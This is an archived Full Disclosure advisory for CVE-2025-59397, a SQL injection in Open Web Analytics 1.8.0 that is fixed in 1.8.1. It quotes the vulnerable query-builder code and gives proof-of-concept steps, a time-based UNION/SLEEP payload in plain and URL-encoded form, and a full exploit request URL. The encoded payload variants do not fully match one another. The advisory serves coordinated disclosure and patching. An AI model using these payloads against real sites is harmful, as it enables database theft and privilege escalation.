| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <DB3PR10MB6809708DAAA0DE9CC259F026D0E1A@DB3PR10MB6809.EURPRD10.PROD.OUTLOOK.COM>
Date: Wed, 8 Oct 2025 12:19:56 +0000
From: Seralys Research Team via Fulldisclosure <fulldisclosure@...lists.org>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] CVE-2025-59397 - Open Web Analytics SQL Injection
Seralys Security Advisory | https://www.seralys.com/research
======================================================================
Title: SQL Injection Vulnerability
Product: Open Web Analytics (OWA)
Affected: Confirmed on 1.8.0 (older versions likely affected)
Fixed in: 1.8.1
Vendor: Open Web Analytics (open-source)
Discovered: August 2025
Severity: HIGH
CWE: CWE-89: SQL Injection
CVE: CVE-2025-59397
CVSS: 6.5 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)
Discovered by: Philippe Caturegli & Mohamed Mahmoudi (Seralys)
======================================================================
Overview
--------
Open Web Analytics (OWA) contains a SQL injection vulnerability in
its query builder (`owa_db.php`). When handling constraints, the
parameter `v[value]` is concatenated into SQL statements without
sanitization.
The vulnerability exist specifically in the logic for operators `=@`
and `!@`, where user-supplied input is directly inserted into a SQL
string.
An attacker with a low-privileged account can supply crafted input
that results in execution of arbitrary SQL queries.
======================================================================
Technical Details
-----------------
Affected Source File:
---------------------
owa_db.php (line 597 and line 601)
https://github.com/Open-Web-Analytics/Open-Web-Analytics/blob/
release-1.8.0/owa_db.php#L596
Relevant code excerpt:
foreach ($params as $k => $v) {
switch (strtolower($v['operator'])) {
[...]
case '=@':
$constraint .= sprintf("LOCATE('%s', %s) > 0",$v['value'],
$this->prepare( $v['name'] ) );
break;
case '!@':
$constraint .= sprintf("LOCATE('%s', %s) = 0",$v['value'],
$this->prepare( $v['name'] ) );
break;
[...]
return $constraint;
}
}
Notes:
- `v['value']` is taken from user-controlled request parameters.
- `v['value']` is directly embedded inside a single-quoted string.
- Because LOCATE parameters are comma-delimited, commas inside
the injected SQL must be preserved (e.g., via `,` encoding) to
avoid being split by the parser before the SQL is constructed.
- Exploitation requires a valid account that can trigger queries with
`owa_constraints`.
======================================================================
Proof of Concept
-----------------
Steps:
1) insert the =@ or !@ operator
2) close the string
3) syntactically complete an early `LOCATE()` call with two arguments.
(note: to preserve commas through the constraint parser, we can encode
them as `,`)
4) inject a time-based payload
5) and comment out the rest of the server-constructed fragment.
Payload example:
owa_constraints=siteId=@...my','dummy') UNION SELECT 1,2,
SLEEP(5)--
Payload example (url encoded):
owa_constraints=siteId%3d%40dummy%27%26%23%34%34%3b%27dummy%27%29%20
UNION%20SELECT%201%26%23%34%34%3b2%26%23%34%34%3bSLEEP%285%29--%20
Full URL:
http://owa_site/api/index.php?owa_siteId=owa_period=last_seven_days&
owa_do=reports&owa_module=base&owa_version=v1&owa_metrics=visits,pageViews,
bounceRate&owa_dimensions=date&owa_sort=date&owa_format=json&
owa_constraints=siteId%3D%3D40dummy%27%20UNION%20SELECT%201%2C%31%2C%33%2C
%34%33%2C%31%2C%36%2C%31%34%33bSLEEP%285%29--%20&owa_nonce=<nonce>
======================================================================
Impact
------
- Authenticated SQL injection in OWA queries
- Database data exfiltration possible
- Risk of privilege escalation through extracted credentials
======================================================================
Vendor Response
---------------
The Open Web Analytics project acknowledged the report and implemented
a fix in commit 1e55315. The issue was resolved in release 1.8.1.
Users are advised to upgrade to this version to address CVE-2025-59397.
======================================================================
Timeline
--------
- 2025-08-19: Vulnerability discovered
- 2025-08-20: Advisory drafted
- 2025-08-20: Vendor contact initiated
- 2025-08-24: Vendor acknowledged receipt and initiated coordination
- 2025-09-01: Fix committed to github (1e55315)
- 2025-09-07: Release 1.8.1 released with security fix
- 2025-09-24: Coordinated disclosure
======================================================================
About Seralys
-------------
Seralys is a boutique penetration testing firm with offices in Europe
and North America. We provide high value-add penetration testing and
security assessments.
https://www.seralys.com
======================================================================
Acknowledgments
---------------
Special shoutout to our fellow researchers at BastardLabs. \m/
======================================================================
Disclaimer
----------
This advisory is provided for coordinated disclosure purposes only.
Reproduction or distribution for malicious use is strictly prohibited.
EOF
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
Powered by blists - more mailing lists